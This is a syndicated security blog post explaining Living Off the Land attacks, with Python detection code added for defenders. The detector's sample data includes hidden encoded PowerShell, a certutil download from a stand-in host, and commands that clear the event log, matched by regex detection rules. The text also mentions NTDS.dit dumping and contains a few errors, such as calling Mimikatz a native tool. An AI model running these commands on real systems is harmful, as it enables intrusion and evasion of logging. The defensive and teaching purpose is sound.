
Living Off the Land (LOTL) Attacks: How your tools are used against you?
Introduction
A well-known organisation called SolarWinds was attacked in September 2019. In this attack, a hacker used a supply chain attack to inject malicious code into the system. More than 18,000 SolarWinds customers installed updates containing the malicious code.
Living off the land attacks use legitimate tools to carry out malicious activities. They are particularly dangerous because they are hard to detect and easily bypass traditional security controls.
In this article, readers will gain a detailed understanding of the living off-the-land attack. They will also learn about its evolution and defensive cyber security measures.
Understanding Living Off the Land (LOTL) Attacks
What is a Living Off the Land Attack?
Living off the Land is an attack in which attackers use legitimate tools and components already present in the victim’s environment to perform their malicious activities.
The term “living off the land” comes from individuals’ survival method of using natural resources instead of relying on external supplies. In terms of cybersecurity, this represents how attackers perform malicious activities using legitimate tools and methods already present in target systems (Windows Management Instrumentation (WMI), PowerShell, Scheduled Tasks, etc.) while remaining undetected.
These attacks are becoming more effective and more common than traditional malware attacks because security tools struggle to detect them. They enable attackers to escalate privileges, steal data, and create a backdoor for future access.
LOTL Meaning and Terminology
The acronym “LOTL” stands for “Living Off the Land” attacks. In these attacks, attackers use legitimate administrative tools to penetrate the network and disguise their actions as genuine system processes. Now, the question is why attackers use this technique. There are many reasons, including:
- Many organisations have less effective security and network management practices, which make it challenging for network defenders to differentiate between authentic and malicious behavior and perform behavioral analytics, proactive hunting, and detection.
- Generally, there is a lack of regular indicators of compromise (IOCs) related to the activity, tracking, and categorising of malicious behavior by network defenders.
- LOTL attacks allow cyber threat actors to avoid applying and investing in custom tools.
Traditional malware such as viruses and ransomware leaves files on disk that signature-based tools can match; LOTL attacks, by contrast, are fileless, meaning the attacker avoids installing any code or scripts on the target system. Instead, attackers use tools already present in the environment, such as PowerShell, password-saving tools, Mimikatz, or Windows Management Instrumentation (WMI), to carry out the attack.
Historical Evolution of Living Off the Land Techniques
APT29/Cozy Bear campaigns use a backdoor named POSHSPY, which relies on two built-in components: Windows Management Instrumentation (WMI) and PowerShell. During an incident response engagement in 2015, it was found that the POSHSPY backdoor was deployed as PowerShell scripts. Later, the attackers updated the backdoor to use WMI for persistence and storage. Over the past two years, APT29 has used POSHSPY in several other environments.
LOTL or Living Off the Land attacks have evolved from loosely organised, isolated techniques into more advanced and integrated campaigns. These attacks now span phases such as initial access, privilege escalation, lateral movement, and persistence. The Verizon Data Breach Investigations Report 2024 states a 180% increase in vulnerability exploitation, because attackers use automated vulnerability scanning to identify security gaps and run their operations smoothly.
In this type of attack, threat actors use scripting languages to run malicious code in memory. This code can go undetected by traditional antivirus software that scans files on disk, which makes it very difficult for security teams to detect and mitigate these attacks.
The LOTL technique is popular among cybercriminals because it is challenging for security systems to detect such attacks. Existing tools and processes of the system do not raise any suspicion or trace for standard security solutions. Thus, hackers can use these tools to remain in the victim’s environment undetected and run malicious code.
Traditional malware techniques require installing malicious software such as viruses or ransomware, whereas the Living Off the Land technique doesn’t require any external installation; it uses existing tools and processes, making it easier for sophisticated attackers to achieve their purposes.
How Living Off the Land Attacks Work
Core Attack Principles
In this attack, scripting languages are used to download and run malicious code without alerting antivirus detection systems. Attackers gain initial access to the system by exploiting network vulnerabilities or spear phishing. Another method attackers use is leveraging system administration tools to move laterally across the network, escalate privileges, explore the network and gain access to systems and data. This enables attackers to carry out their malicious activities continuously and undetected.
The key principles of this attack include:
- Fileless malware: The fileless nature of LOTL attacks allows attackers to execute malicious payloads directly in memory without installing external software.
- Evade detection: LOTL attacks use existing system tools, which prevent attackers from triggering security alarms and being detected.
- Misuse of Administrative Tools: Hackers use legitimate system tools that make it difficult for security teams to recognise malicious activity.
- Persistence: LOTL attacks let attackers build backdoors into the system using tools like PowerShell and WMI to plan for future attacks and observation.
Living-Off-the-Land Binaries (LOLBins)
LOLBins (Living Off The Land Binaries) are legitimate system binaries that can be repurposed for malicious ends. Attackers use these binaries to bypass security controls and run commands. Some examples of LOLBins include certutil, WMIC and PowerShell. All of these binaries have genuine administrative functions, which can be abused to run malicious code.
These binaries are perfect attack vectors for carrying LOTL attacks because of their capabilities and built-in trust with operating systems. These tools are already present on most Windows systems, reducing the attacker’s efforts to perform this attack. Using these binaries, attackers can also execute malicious code and remain undetected.
Detailed Attack Techniques and Methodologies
Living Off The Land (LOTL) attacks use various techniques to manipulate built-in system tools and genuine software to run malicious activities without being detected. Understanding these common techniques and methodologies is essential to detecting and reducing LOTL attacks before they cause serious damage.
One key element of LOTL attacks is fileless malware. Using tools like PowerShell, attackers can inject code directly into memory without writing malicious files to disk, making it difficult for traditional antivirus solutions to detect or stop the threat.
Exploitation of PowerShell is one of the widely used techniques in these attacks. PowerShell is a vital Windows scripting language that enables administrators to execute automated system tasks. Attackers use PowerShell to install and execute malicious code, modify system configurations, and perform data exfiltration. If an organisation overlooks monitoring command-line activity, it can easily go undetected, as PowerShell is a legitimate tool.
Another commonly used tool in LOTL attacks is Windows Management Instrumentation (WMI). WMI’s function is to query and manage system components. However, attackers use it for remote code execution, persistence, and lateral movement. Attackers can execute malicious scripts using WMI without developing new processes, which makes it difficult for traditional security tools to detect suspicious activity.
Memory-only malware exists only in memory, which is why it remains undetected. The Duqu worm is an example of memory-only malware. Cybercriminals use the Duqu worm for exploration, lateral movement, and data exfiltration.
Process injection techniques allow attackers to perform malicious activities using processes that either have valuable information (e.g., lsass.exe) or blend with operating system activity. Attackers use this attack to gain high-privilege access to part of the operating system. This attack doesn’t require dropping any malicious code to disk and enables the injection of payloads into the memory.
Real-World LOTL Attack Examples
Notable LOTL Attack Case Studies
Real-world LOTL attack examples include the Petya and NotPetya attacks in 2017. These attacks caused significant damage to organisations and businesses worldwide. In these incidents, the attackers encrypted the victims' files and demanded a ransom in exchange for the decryption key.
In 2020, NetWalker (a ransomware group) used the LOTL technique to attack a California healthcare institute, encrypting the victims' crucial files and demanding a ransom. This incident disrupted the healthcare system's medical services, forcing it to redirect patients to other hospitals and delaying critical treatments.
In September 2019, a well-known company named SolarWinds suffered an attack. In this incident, a hacker used a supply chain attack to insert malicious code into the system. Over 18,000 SolarWinds customers installed updates with that malicious code. As a result, hackers impersonated users and accounts to spy on other organisations.
Industry-Specific LOTL Attack Patterns
The LOTL attacks have some serious high-profile incidents, including those in financial institutions, healthcare, and government sectors.
During the Ukraine power grid attack in 2015, an attacker used tools like PsExec and WinRM to move laterally across the network, using stolen credentials to execute malicious code. This incident disrupted electricity for 230,000 residents.
In 2017, the NotPetya attack caused over $10 billion in damages and disruption in companies like Merck and Maersk. In this incident, attackers disguised themselves as ransomware and used Mimikatz to steal credentials and PsExec to execute remote commands.
In 2023, the Volt Typhoon campaign, a Chinese state-sponsored group, used Windows built-in tools, remote administrative tools, and self-signed certificates to target U.S. critical infrastructure such as telecoms. In the same year, a Chinese APT group targeted Southeast Asian governments by using digitally signed but vulnerable binaries to install malicious payloads, which enabled hackers to persist without using external malware.
Scattered Spider, also known as UNC3944, is a hacking group that attacked MGM in September 2023 with SIM swapping and SIM phishing. It gained access to MGM’s internal systems using social engineering. According to the report, this hacking group bypassed multi-factor authentication technologies using one-time passwords and login credentials. This incident resulted in substantial financial losses and extensive disruptions.
Anatomy of a LOTL Attack: Step-by-Step Walkthrough
Initial Access—The first step in the Living Off the Land attack lifecycle includes gaining initial access through RDP exploitation, stolen credentials, phishing techniques, or remote access tools. This way, the attacker enters the system disguised as an employee.
Execution and Privilege Escalation—The hacker acts as authorised personnel, using legitimate tools like PowerShell and WMI without installing any external software. This way, they slowly gain higher access, stealing admin credentials using the Mimikatz tool.
Lateral Movement—In this step, the hacker uses PsExec and RDP to access sensitive servers without being detected by AV detection and firewalls.
Data Exfiltration—They can access critical files and systems using commands like certutil, stealing data without triggering system security alarms.
Persistence—To leave no trace of their malicious activity, hackers use wevtutil to clear logs and build a hidden backdoor for observations and future exploitation.
Why LOTL Attacks Are So Effective
Bypassing Traditional Security Controls
Security solutions like antivirus use signature-based detection to detect traditional malware, relying on externally introduced or injected malicious code. But LOTL attacks use trusted system tools and environments, so they do not get detected and bypass signature-based detection.
Most antivirus software uses signature-based detection methods to identify malicious activities. Therefore, it is difficult for antiviruses to detect LOTL attacks.
IP allowlisting is often impractical because many organisations allow a wide range of IPs, for example all the IPs of a cloud provider. Attackers might lease neighbouring IPs in that range to perform their attacks. Therefore, specifying the exact IP range and keeping the allowlist short is recommended.
Hiding in Plain Sight
Some creatures make themselves invisible to their predators by blending into their surroundings. In the same way, LOTL attacks hide their presence by camouflaging malicious activity as normal system activity. This makes such attacks challenging to detect. Additionally, the use of legitimate tools gives the activity a veneer of plausibility, making it harder to quickly identify wrongdoing in the network. This is how such threats hide in plain sight: no external tooling is introduced into the environment.
As mentioned earlier, these attacks use native system tools and binaries, so it is genuinely difficult to differentiate malicious activity from routine administrative tasks.
Advantages for Advanced Threat Actors
As attackers use pre-approved administrative tools like WMI or PsExec, they don’t need to develop custom malware. They can quickly run any commands using the system tools.
Threat actors like this technique because it is less likely that they will be detected by firewalls and AV detection. They don’t have to install any external software, such as viruses or malware. They can pretend to be authorised employees and cover their traces of malicious activities.
Detecting Living Off the Land Attacks
Behavioral Analysis and Anomaly Detection
To detect such attacks, it is recommended that one focus on behavioral analysis rather than signatures. In this attack, an attacker uses legitimate system tools and binaries and hence remains undetected. One should focus on detecting any unusual system or user behavior to identify such attack attempts.
Monitoring any unusual commands executed by system tools, especially administrative tools, can also help you detect LOTL attacks.
Sometimes, an attacker might exploit any parent process by creating a malicious child process. Therefore, it is essential to check for any suspicious parent-child relationships.
Advanced Monitoring Strategies
There are various advanced monitoring strategies to detect LOTL attacks. One such strategy is PowerShell logging and script block logging. Detailed logging, including the commands run and the level of access, can help you identify any malicious activities carried out using PowerShell.
One should also monitor process creation; if any suspicious or unusual process is created, it might be a potential indicator of a LOTL attack.
It is advised to monitor network traffic and logs regularly. Network traffic from any unknown or unusual connection should be analysed, especially to domains or IPs associated with tools like Cobalt Strike, Chisel or Qakbot.
SIEM and EDR Approaches
Modern tools use Machine Learning and Artificial Intelligence to detect LOTL attacks. These tools have advanced monitoring capabilities to detect deviations from usual behavior. They also use intelligence feeds to remain updated with the latest Indicators of Compromise (IOCs) and attack techniques.
Some of the famous and common SIEM platforms are as follows:
- Splunk: a SIEM platform with advanced analytics and correlation capabilities.
- IBM QRadar: a SIEM platform with threat intelligence and automated response capabilities.
- LogRhythm: a SIEM tool that detects such attacks using machine learning and behavioral analytics.
One can also monitor the security logs with Event ID 4688, which is related to command-line and process creation logs, and Event ID 4673, which is related to privilege use logs.
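The behavioural checks described above (unusual command lines, suspicious parent-child relationships, and Event ID 4688 process-creation logs) can be turned into concrete triage rules. The following is an added example written for this article, not code from the original post; it runs over a handful of constructed 4688-style records and assumes command-line auditing is enabled so the CommandLine field is populated.

```python
"""Rule-based triage of Windows Security Event ID 4688 (process creation) records
for LOTL indicators: LOLBins launched from unusual parents, encoded or hidden
PowerShell, certutil used for download/decode, and event-log clearing.
All sample events below are constructed for this example, not real telemetry."""
import re

# Constructed 4688-style records (fields shortened; a real event also carries
# ProcessId, NewProcessId, TokenElevationType, etc.).
SAMPLE_EVENTS = [
    {"user": "jsmith", "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\notepad.exe",
     "cmdline": "notepad.exe notes.txt"},
    {"user": "jsmith", "parent": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -nop -w hidden -enc AAAA..."},   # base64 placeholder
    {"user": "svc_backup", "parent": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\certutil.exe",
     "cmdline": "certutil.exe -urlcache -split -f http://example.invalid/a.txt a.txt"},
    {"user": "admin", "parent": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\wevtutil.exe",
     "cmdline": "wevtutil.exe cl Security"},
    {"user": "SYSTEM", "parent": r"C:\Windows\System32\svchost.exe",
     "image": r"C:\Windows\System32\wbem\WmiPrvSE.exe",
     "cmdline": "WmiPrvSE.exe"},
    {"user": "NETWORK SERVICE", "parent": r"C:\Windows\System32\wbem\WmiPrvSE.exe",
     "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": "cmd.exe /c whoami"},
]

# Binaries the article names as LOLBins, plus a few close relatives.
LOLBINS = {"powershell.exe", "pwsh.exe", "wmic.exe", "certutil.exe", "mshta.exe",
           "rundll32.exe", "regsvr32.exe", "wevtutil.exe", "bitsadmin.exe"}
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe"}
# Parents that have no business spawning a shell or script host.
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}

# Command-line heuristics; each is a (rule name, compiled pattern) pair.
CMDLINE_RULES = [
    ("powershell_encoded", re.compile(r"powershell.*\s-(e|ec|enc|encodedcommand)\s", re.I)),
    ("powershell_hidden_noprofile", re.compile(r"powershell.*-nop\b.*-w\s+hidden", re.I)),
    ("certutil_download_or_decode", re.compile(r"certutil.*\s-(urlcache|decode)\b", re.I)),
    ("eventlog_cleared", re.compile(r"wevtutil(\.exe)?\s+cl\s", re.I)),
]

def basename(path):
    """Lower-cased file name of a Windows path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def triage_event(ev):
    """Return a list of (rule, detail) findings for one 4688-style event."""
    findings = []
    image, parent = basename(ev["image"]), basename(ev["parent"])
    # Suspicious parent-child relationships (the behaviour-based checks).
    if parent in OFFICE_PARENTS and image in SHELLS | LOLBINS:
        findings.append(("office_spawns_shell", f"{parent} -> {image}"))
    if parent == "wmiprvse.exe" and image in SHELLS:
        findings.append(("wmi_spawns_shell", f"{parent} -> {image}"))
    # Command-line content checks (need command-line auditing enabled for 4688).
    for name, pattern in CMDLINE_RULES:
        if pattern.search(ev["cmdline"]):
            findings.append((name, ev["cmdline"]))
    return findings

def triage(events):
    """Map each suspicious event's index to its findings; benign events are omitted."""
    results = {}
    for i, ev in enumerate(events):
        findings = triage_event(ev)
        if findings:
            results[i] = findings
    return results

if __name__ == "__main__":
    for idx, findings in triage(SAMPLE_EVENTS).items():
        print(idx, SAMPLE_EVENTS[idx]["user"], findings)
```

Only the Word-spawned PowerShell, the certutil download, the log clearing and the WMI-spawned shell are reported; the notepad launch and the WmiPrvSE host process itself are left alone, which is the kind of precision a rule set needs before it goes into a SIEM.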
LOTL Defense Strategies
Preventive Measures
Application allowlisting restricts which applications your systems can run, helping mitigate LOTL risks. Instead of blocking known-bad applications, allowlisting lets your business teams use only the software they actually need.
PowerShell in full language mode enables attackers to access system files, run arbitrary code, and modify security settings. By switching PowerShell to constrained language mode, these powers can be significantly reduced, lowering the attack surface.
Attackers rely on scripting languages to run malicious code. Restricting scripting languages or enforcing strict control can reduce the risk of LOTL attacks.
Architectural Controls
Network segmentation helps organisations avoid attackers’ movement within the internal network. If the internal network is segmented, attackers won’t be able to move laterally inside it.
One effective defensive strategy includes privileged access management. A least-privilege access control policy helps to ensure that users only have access to the resources and data they need to perform their functions. This limits access to sensitive data and resources, eventually lowering the risk of LOTL attacks.
Another effective prevention strategy is implementing a zero-trust architecture. Before giving access to every access request, it is essential to verify it, as no entity is automatically trusted thoroughly.
Response and Remediation Strategies
Many sophisticated attackers stay undetected in the victim’s environment for months or years. In such cases, a comprehensive historical analysis is essential. Suppose the assessment shows that an attack has occurred or is still running. In that case, the organisation should restrain the damage, repair and recover the affected systems, and strengthen the network against future threats.
The Future of Living Off the Land Attacks
Emerging LOTL Techniques
These days, LOTL attacks are evolving, and new tools and binaries are being targeted.
In the early days, LOTL was used by Advanced Persistent Threat groups, like APT33 (Elfin Group) and APT29 (Cozy Bear), to carry out attacks requiring persistence and stealth. But these days, attackers are using these techniques to perform various malicious activities, such as ransomware, financial crime, supply chain attacks, etc.
Attackers can perform LOTL attacks on any platform, regardless of whether it is Windows, macOS, or Linux. For macOS operating systems, this attack is sometimes also called "Living off the Land." To get the full list of LOOBins for macOS, visit https://www.loobins.io/binaries/.
In a cloud environment, an attacker abuses the misconfigured permissions and other configurations to escalate their privileges.
Defensive Evolution
LOTL attack types pose a unique challenge to the security community. The security world has had to rethink how it spots bad guys using good tools completely. It’s a bit like trying to spot a thief who’s borrowed your kitchen knife – tricky, right? Traditional security tools used to look for dodgy-looking software, but now they’re much brighter, watching how legitimate tools behave and raising eyebrows when something seems off. It’s been quite the shift for security teams who’ve finally accepted that attackers will use the tools already on the system.
Machine learning has changed the game for spotting these LOTL attacks. These clever systems learn what “normal” looks like when IT admins use system tools, then notice when something doesn’t quite fit the pattern. Many UK companies have started using behaviour analytics that can tell the difference between Bob doing his job in IT and a hacker using the same Windows tools for something nasty. It’s not perfect, but it’s getting better all the time.
The threat-hunting crowd has also developed a unique knack for detecting these attacks. Rather than waiting for alerts, they’re actively poking around, looking at which processes spawned which others, and digging into computer memory to find malware that never even touched the hard drive. The cutting-edge stuff includes new tech that can protect the system tools themselves from being misused and clever ways to limit admin privileges until needed. It’s a cat-and-mouse game, but the defenders are catching up.
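The baselining idea in the two paragraphs above (learn what "normal" tool use looks like per user and per parent process, then score departures from it) can be prototyped without any ML library. This is an added example written for this article, not code from the original post; the baseline counts and new events are constructed, and the three-part score and the rarity threshold of 5 are assumptions chosen for illustration.

```python
"""Frequency-baseline anomaly scoring for process telemetry: learn which
(user, parent image, child image) combinations are normal from a historical
window, then flag new events whose pairs are rare or unseen.
All counts and events below are constructed for this example."""
from collections import Counter

# Constructed baseline: a week of routine activity, already aggregated as
# (user, parent_image, child_image) -> count, which is how a SIEM would store it.
BASELINE_COUNTS = Counter({
    ("itadmin", "explorer.exe", "powershell.exe"): 140,
    ("itadmin", "explorer.exe", "mmc.exe"): 60,
    ("itadmin", "cmd.exe", "wmic.exe"): 25,
    ("svc_backup", "services.exe", "backup.exe"): 700,
    ("svc_backup", "backup.exe", "vssadmin.exe"): 700,
    ("jsmith", "explorer.exe", "winword.exe"): 300,
    ("jsmith", "explorer.exe", "outlook.exe"): 300,
})

def build_baseline(counts):
    """Derive the reference sets a scorer needs: per-user child images,
    estate-wide parent->child pairs, and how often each full triple occurred."""
    per_user = {}
    pairs = Counter()
    for (user, parent, child), n in counts.items():
        per_user.setdefault(user, Counter())[child] += n
        pairs[(parent, child)] += n
    return {"per_user": per_user, "pairs": pairs, "triples": Counter(counts)}

def score_event(baseline, user, parent, child, rare_threshold=5):
    """Score 0..3: +1 if this user never ran the child image, +1 if the
    parent->child pair is unseen anywhere, +1 if the exact triple is rare."""
    reasons = []
    user_hist = baseline["per_user"].get(user, Counter())
    if user_hist[child] == 0:
        reasons.append("new_image_for_user")
    if baseline["pairs"][(parent, child)] == 0:
        reasons.append("unseen_parent_child_pair")
    if baseline["triples"][(user, parent, child)] < rare_threshold:
        reasons.append("rare_triple")
    return len(reasons), reasons

def score_batch(baseline, events, min_score=2):
    """Return (score, event, reasons) for events at or above min_score, highest first."""
    scored = []
    for user, parent, child in events:
        s, why = score_event(baseline, user, parent, child)
        if s >= min_score:
            scored.append((s, (user, parent, child), why))
    return sorted(scored, key=lambda t: -t[0])

# Constructed new events: routine admin work beside LOTL-style activity, where a
# user's Word session spawns PowerShell and a service account starts running WMIC.
NEW_EVENTS = [
    ("itadmin", "explorer.exe", "powershell.exe"),
    ("jsmith", "winword.exe", "powershell.exe"),
    ("svc_backup", "cmd.exe", "wmic.exe"),
    ("itadmin", "cmd.exe", "wmic.exe"),
]

if __name__ == "__main__":
    for score, event, reasons in score_batch(build_baseline(BASELINE_COUNTS), NEW_EVENTS):
        print(score, event, reasons)
```

The admin's own PowerShell and WMIC use scores zero because it matches the baseline, while the same binaries run by the wrong user or from the wrong parent are surfaced; in practice the baseline would be rebuilt on a rolling window so that legitimate change does not stay "anomalous" forever.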
Predictions and Trends
Where are LOTL attacks heading? Attackers aren’t just going to give up – they’re getting craftier, starting to use obscure system utilities that most security teams haven’t even thought to monitor. It’s becoming a real headache for companies with different systems, as attackers develop tricks that work simultaneously across Windows, Mac and Linux. We’re also seeing them space out their activities over more extended periods – doing a bit here, waiting a while, then doing a bit there – making it harder to connect the dots.
During our internal pen test and red teaming jobs, the LOTL attack vector is one of the most effective techniques. Some quick examples include dumping NTDS.dit contents using ntdsutil and running enumeration techniques using AD tools installed on the servers. These attacks go unnoticed because they use legitimate tooling present within the environment. This can only be detected with extensive logging and monitoring at the user account, network, and AD-level layers.
As defences improve, the bad guys keep adapting. They’re getting good at tailoring their evasion techniques to specific tools and leveraging trusted cloud platforms that security teams are reluctant to block. Some particularly worrying incidents have involved dodgy versions of legitimate admin tools being slipped into the supply chain. Imagine downloading what you think is a trusted tool, but it’s been tampered with before it even reaches you—nasty business that’s devilishly hard to spot.
AI is shaking things up on both sides of this battle. Security teams are using it to spot unusual patterns in how system tools are being used. In contrast, attackers might soon use AI to automatically pick the best LOTL techniques for each target. The innovative organisations aren’t waiting around – they’re already working on the assumption that their trusted tools will be weaponised at some point. They’re limiting who can use what, keeping a close eye on everything, and ensuring their security teams know what suspicious activity looks like. It has a bit of a grim outlook, but at least people are taking it seriously now.
Conclusion
Living off-the-land attacks are one of the most complex and challenging threats in cybersecurity. They are hard to detect by methods like sandboxing, allowlisting, signature-based methods, and pattern recognition techniques. This is due to their stealthy nature, using system binaries and tools like PowerShell, WMI, or CertUtil. Still, organisations can minimise the risk by using behavioral monitoring, network segmentation, and other methods. Customising these strategies to meet or balance your operational and regulatory requirements is important.
Your organisation might be considering an active directory security assessment and thorough infrastructure pen testing services on an annual or post-change basis. If not, it’s worth asking us for a competitive quote to help you make an informed decision.
How long ago was your internal pen test done? Did you do it thoroughly and not just a point-and-click scanning exercise? If you need advice, get in touch to discuss your strategy.
Frequently Asked Questions
What is a living off the land attack?
Living off the land is a complicated cyber attack in which the attacker targets legitimate tools and system applications to perform malicious activities.
What is a living-off-the-land binary (LOLBin)?
A living-off-the-land binary (LOLBin) is a non-malicious operating-system binary that performs regular tasks. Some common examples of LOLBins are certutil and the Windows Management Instrumentation Command Line (WMIC).
How do living-off-the-land attacks differ from traditional malware?
Unlike traditional malware attacks, living-off-the-land attacks exploit system-native tools and binaries to bypass traditional security measures like antiviruses.
What are the most common tools used in LOTL attacks?
The most common tools used in LOTL attacks are PowerShell and WMI.
How can I detect living off the land techniques in my environment?
There are various ways to detect living off the land techniques, including enabling detailed event logging, recording day-to-day activities, and creating a baseline of installed tools and software.
Are LOTL attacks only targeting Windows systems?
No, LOTL attacks can be performed on any operating system like Windows, macOS or Linux.
This is a Security Bloggers Network syndicated blog from Cyphere authored by Amit Kumar. Read the original post at: https://thecyphere.com/blog/living-off-the-land-attacks/